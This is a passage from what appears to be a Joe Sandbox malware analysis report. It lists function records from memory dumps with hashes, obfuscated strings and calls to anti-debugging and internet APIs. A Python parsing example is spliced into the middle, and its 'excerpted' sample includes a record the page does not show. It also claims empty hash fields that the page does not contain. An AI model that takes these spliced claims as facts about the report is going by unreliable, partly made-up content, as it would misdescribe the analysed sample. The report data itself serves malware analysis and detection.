                      • Instruction Fuzzy Hash: 9A3224B1D002549BEF28DF64CC48BAEBBB4AF81318F1542F9D4096B291DB75AE84CF45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: Bu7$^\o$j9E$l~$szv[$szv[$]M
                      • API String ID: 0-3990430381
                      • Opcode ID: 3bdac6a2f9ca15f2f1d4381398ea43e72116445f60213044dda7447274e4ce29
                      • Instruction ID: d3776f6fd038895c9a59e5b105fd12283626dffd50783d6a79828c2877a3d8c4
                      • Opcode Fuzzy Hash: 3bdac6a2f9ca15f2f1d4381398ea43e72116445f60213044dda7447274e4ce29
                      • Instruction Fuzzy Hash: C6B2F4F3A0C6049FE304AE2DDC8567AFBE5EF94620F1A493DEAC4C7740EA3558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: )K[/$-|^$2`l{$2y4$anh?$kYo~$n(s
                      • API String ID: 0-2341076803
                      • Opcode ID: 8c0752214133b26571dd84f2b9cbbadd63e363c59522a6b729147e171c2818a1
                      • Instruction ID: 2c214f45fe069bb082464012a7b27f67f9c4500e2fc640b9b3d7320f177ba3ac
                      • Opcode Fuzzy Hash: 8c0752214133b26571dd84f2b9cbbadd63e363c59522a6b729147e171c2818a1
                      • Instruction Fuzzy Hash: F7B2E3F360C2049FE308AE2DEC8567ABBE9EF94720F16493DE6C5C7744EA3558048697
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 1jwt$2KW3$Wr?_$v{g$0_{$LlK
                      • API String ID: 0-2574484924
                      • Opcode ID: 2ef90ecee5913f1cb820ccb2b77b915ab2d066fec45e7c1db98966a16b70f6a6
                      • Instruction ID: 0ee09096c6d5bbad2909acd36cd473c546fab450177273ce538d8d7217357b00
                      • Opcode Fuzzy Hash: 2ef90ecee5913f1cb820ccb2b77b915ab2d066fec45e7c1db98966a16b70f6a6
                      • Instruction Fuzzy Hash: 06B207F360C204AFE7046E2DEC8567AFBE9EF94720F16893DEAC483744E63558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2 y$7Tm$`Rv$`y@u$e(2]$5?o
                      • API String ID: 0-674698629
                      • Opcode ID: c76da4c0fa373625079375407c477a72830d562d5e83dfc949c442c9a2414b1b
                      • Instruction ID: 8f7f75c9eaff73d8836d398441331e84d028458bce32c96937f23de36ae52e07
                      • Opcode Fuzzy Hash: c76da4c0fa373625079375407c477a72830d562d5e83dfc949c442c9a2414b1b
                      • Instruction Fuzzy Hash: 81B208F3A082009FE314AE2DDC8566ABBEAEFD4720F1A853DE6C4C7744E63558058697
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: COR$$ZwS$qx/$0~
                      • API String ID: 0-681313600
                      • Opcode ID: 81266a29e0405d02b955d789d63249f2bb3305f4842471a2fd83f20afc8d358d
                      • Instruction ID: c6e51c3a3388742c532369b3e8eaaea841d7581c226e9d8855c416ff7865fff2
                      • Opcode Fuzzy Hash: 81266a29e0405d02b955d789d63249f2bb3305f4842471a2fd83f20afc8d358d
                      • Instruction Fuzzy Hash: 0DB215F3A0C2149FE304AE2DEC8567ABBE5EF94320F1A893DE6C4C7744E63558058792
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 819956c8da69d9361fbf4e47ff42106ad8a36c3f0c6e400b1e605b299af52eb5
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 3B022B71E012199FDB14CFA8C980BAEBBB5FF88314F248669D919EB350D731A945CB90
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0494A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0494A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0494A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0494A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: 94c94a44b135ae989381e55fd8a71094e507e145c67eccc9764a277a8ef2010e
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: C1312975D4521CDBDB10DFA4D989BCDBBB8BF48304F1040AAE50DAB250EB71AA85CF44
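Several records above list the same function twice: once from the 00400000 image (based on PE: true) and once from the 04940000 region (based on PE: false), with an identical Opcode ID and, for the IsProcessorFeaturePresent/IsDebuggerPresent function, a different Instruction ID. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the format printed on this page, checks that the IDs are well-formed (tolerating the empty Instruction Fuzzy Hash two records on this page carry), and lists every Opcode ID seen at more than one dump offset, a quick way to tell which dumped regions hold a copy of the main image's code. The SAMPLE string is excerpted from the records above and trimmed to the lines the parser reads; that Opcode ID ignores address operands while Instruction ID does not is an assumption drawn from those records, not something the report states.

```python
"""Cross-check the per-function records above: which functions appear in more
than one memory dump?  Added example; not part of the Joe Sandbox report."""
import re
from collections import defaultdict

# Four records excerpted from the report above, trimmed to the lines this
# parser reads (API call lines, Source File, and the ID/hash fields).
SAMPLE = """\
• IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
• IsDebuggerPresent.KERNEL32 ref: 0040A662
• Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
• Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
• Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
• IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0494A7FD
• IsDebuggerPresent.KERNEL32 ref: 0494A8C9
• Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
• Instruction ID: 94c94a44b135ae989381e55fd8a71094e507e145c67eccc9764a277a8ef2010e
• Instruction Fuzzy Hash: C1312975D4521CDBDB10DFA4D989BCDBBB8BF48304F1040AAE50DAB250EB71AA85CF44
• SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
• Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExceptionFilterUnhandled
• Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
• Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
• Instruction Fuzzy Hash:
• SetUnhandledExceptionFilter.KERNEL32(0040A72C,0494A30B), ref: 0494A98C
• Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
• API ID: ExceptionFilterUnhandled
• Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
• Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
• Instruction Fuzzy Hash:
"""

FIELDS = {"API ID": "api_id", "Opcode ID": "opcode_id",
          "Instruction ID": "instr_id", "Instruction Fuzzy Hash": "instr_fuzzy"}
API_LINE = re.compile(r"(?<![a-z])ref: [0-9A-F]+$")   # "..., ref: 0040A596"
HEX64 = re.compile(r"^[0-9a-f]{64}$")


def parse_records(text):
    """One dict per function record.  A record ends at its Instruction Fuzzy
    Hash line (the last field printed per function); an empty value, as on
    two records of this page, is stored as None."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        key, _, val = line.partition(":")
        if key == "Source File":
            m = re.search(r"Offset: ([0-9A-F]+), based on PE: (true|false)", line)
            cur["offset"], cur["pe"] = m.group(1), m.group(2) == "true"
        elif key in FIELDS:
            cur[FIELDS[key]] = val.strip() or None
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = {"apis": []}
        elif API_LINE.search(line):
            cur["apis"].append(line.split(".", 1)[0])   # name before ".KERNEL32"
    return records


def well_formed(rec):
    """Opcode ID and Instruction ID are 64 hex chars; fuzzy hash may be absent."""
    return (bool(HEX64.match(rec.get("opcode_id") or ""))
            and bool(HEX64.match(rec.get("instr_id") or ""))
            and (rec.get("instr_fuzzy") is None
                 or re.fullmatch(r"[0-9A-F]+", rec["instr_fuzzy"]) is not None))


def relocated_functions(records):
    """Opcode IDs seen at more than one dump offset, with the offsets, the APIs
    the function calls, and whether the Instruction ID matched too.  Assumption
    (not stated by the report): Opcode ID hashes opcode bytes without address
    operands, so relocated code keeps it while the Instruction ID changes."""
    by_opcode = defaultdict(list)
    for r in records:
        by_opcode[r["opcode_id"]].append(r)
    out = {}
    for oid, recs in by_opcode.items():
        offsets = sorted({r["offset"] for r in recs})
        if len(offsets) > 1:
            out[oid] = {
                "offsets": offsets,
                "api_id": recs[0].get("api_id"),
                "apis": sorted({a for r in recs for a in r["apis"]}),
                "same_instruction_id": len({r["instr_id"] for r in recs}) == 1,
            }
    return out


if __name__ == "__main__":
    for oid, info in relocated_functions(parse_records(SAMPLE)).items():
        print(oid[:16], info["offsets"], info["apis"], info["same_instruction_id"])
```

Run against the full text of this section rather than the excerpt, the same check flags every Opcode ID the 00400000 and 04940000 dumps share; a function reported with `same_instruction_id` true, as the SetUnhandledExceptionFilter stub is here, carries no address-dependent operands, so only the Instruction Fuzzy Hash (when present) or the dump offset tells the two copies apart.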
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: r}$0($`,O
                      • API String ID: 0-3337568009
                      • Opcode ID: bdb37a88f25d5834bffceefb2514544e1b1c23cc08f6ca29129898fdb7304190
                      • Instruction ID: 4d0689223c9f81fe8f54824ce0ae5c0eaeb187e00e8bc79e878c24d93b0adb73
                      • Opcode Fuzzy Hash: bdb37a88f25d5834bffceefb2514544e1b1c23cc08f6ca29129898fdb7304190
                      • Instruction Fuzzy Hash: 99A204F360C6009FE304AE29EC8567AFBE5EF94720F16893DEAC4C7744E63598058697
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04942AA0), ref: 0494D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04942AA0), ref: 0494D14C
                      • UnhandledExceptionFilter.KERNEL32(0494277A,?,?,?,?,?,04942AA0), ref: 0494D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: 21efebb5599d5716e685dac3d0bd9a8c9b414818c4671e61e10afad7f7c4e334
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 9331A7759112289BCB61DF64DC89BDDBBB8BF48310F5041EAE81CA7260E770AF858F44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &qI$b!w
                      • API String ID: 0-2825573136
                      • Opcode ID: 7b9f4cc0877dce6912bcc471352275226ea2c5d293311d3ec9b7d47dcd667461
                      • Instruction ID: 2747edcbf84934c4366ab91f2b26374a840f6942f8198cf63c28fbf37ff610c5
                      • Opcode Fuzzy Hash: 7b9f4cc0877dce6912bcc471352275226ea2c5d293311d3ec9b7d47dcd667461
                      • Instruction Fuzzy Hash: F0B2D3F360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7344EA3558458697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 25c07b4df250cc591a60015adfc3b3f30e6c5af78002851d15ca102c04993424
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: D9316CB6910609DFEB10CF99C880AAEBBF9FF88328F14405AD541A7310D771FA45CBA4
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                      • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04955990,?,?,00000008,?,?,0495C8F1,00000000), ref: 04955BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6a92360c6ed593a8163160f57951f5ff22a9c40d74ee45768f7a554f177bb73f
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 71B11D31610608EFD715CF28C48AB657BE1FF45364F268668E899CF2B6D335E991CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8_
                      • API String ID: 0-877351122
                      • Opcode ID: 08251fee22e3bb3dee8c6373fdee19eacd1ba4d8ff5c84a9072cdd1aa16082a1
                      • Instruction ID: 80792b2ecf6f4b90055e834753f85fb45e20e246bb3901563a09c7f5398c314b
                      • Opcode Fuzzy Hash: 08251fee22e3bb3dee8c6373fdee19eacd1ba4d8ff5c84a9072cdd1aa16082a1
                      • Instruction Fuzzy Hash: 05D13BF3A086049FE3046E6DEC8577ABBD9EB94360F1A463DE9C4C7744F93598058683
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                      • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: NTDL
                      • API String ID: 0-3662016964
                      • Opcode ID: 505011dabb556b50efa4231c028ad2c67dd37abfe8d02df4b47721e18c8b5d34
                      • Instruction ID: a3b22492b67c40a641078b1321d3c227a51c551e6254534620a2b16f73c8a81e
                      • Opcode Fuzzy Hash: 505011dabb556b50efa4231c028ad2c67dd37abfe8d02df4b47721e18c8b5d34
                      • Instruction Fuzzy Hash: 02C1027290821E9FDB11CF64C5015DF7BA4EF4A322F24C12BE84A93A41D27A5E11EF5E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                      • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction ID: b5095156a5f690e3642485833f0ac53df0a1c405d01f16cdc1e8a54bfb3d9efb
                      • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction Fuzzy Hash: C1C10134A006478FDB28CF68C594E7ABBBAFFC5304F144A39D4529BA98D730B945CB60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                      • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction ID: fa01a4797d1f63c394b1f7f654db9bb519510f43bc4b30c868f50a83e00bf471
                      • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction Fuzzy Hash: F0B18F71A0060B8BDF24CF68C958EBEBBA9FFC4304F140A79D59297694D731BA41CB61
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
